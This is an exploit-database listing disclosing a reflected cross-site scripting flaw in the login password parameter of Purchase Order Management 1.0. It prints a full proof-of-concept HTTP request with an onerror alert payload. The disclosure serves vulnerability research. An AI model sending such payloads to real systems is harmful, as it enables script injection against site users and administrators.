Exploit for Purchase Order Management 1.0 Cross Site Scripting

Name: Exploit for Purchase Order Management 1.0 Cross Site Scripting
Rating: 5 (187 reviews)
2023-03-06 | CVSS -0.4
## https://sploitus.com/exploit?id=PACKETSTORM:171238
## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering  
## Author: nu11secur1ty  
## Date: 03.06.2023  
## Vendor: https://www.sourcecodester.com/user/257130/activity  
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected  
  
## Description:  
The value of the `password` request parameter is copied into the HTML  
document as plain text between tags. The payload uay4w<img src=a  
onerror=alert(1)>s4m6g was submitted in the password parameter. This  
input was echoed unmodified in the application's response.  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
```POST  
POST /purchase_order/classes/Login.php?f=login HTTP/1.1  
Host: localhost  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
Referer: http://localhost/purchase_order/admin/login.php  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 37  
  
username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)  
  
## Proof and Exploit:  
[href](https://streamable.com/cgw8a4)  
  
## Time spend:  
00:15:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at  
https://packetstormsecurity.com/https://cve.mitre.org/index.html and  
https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>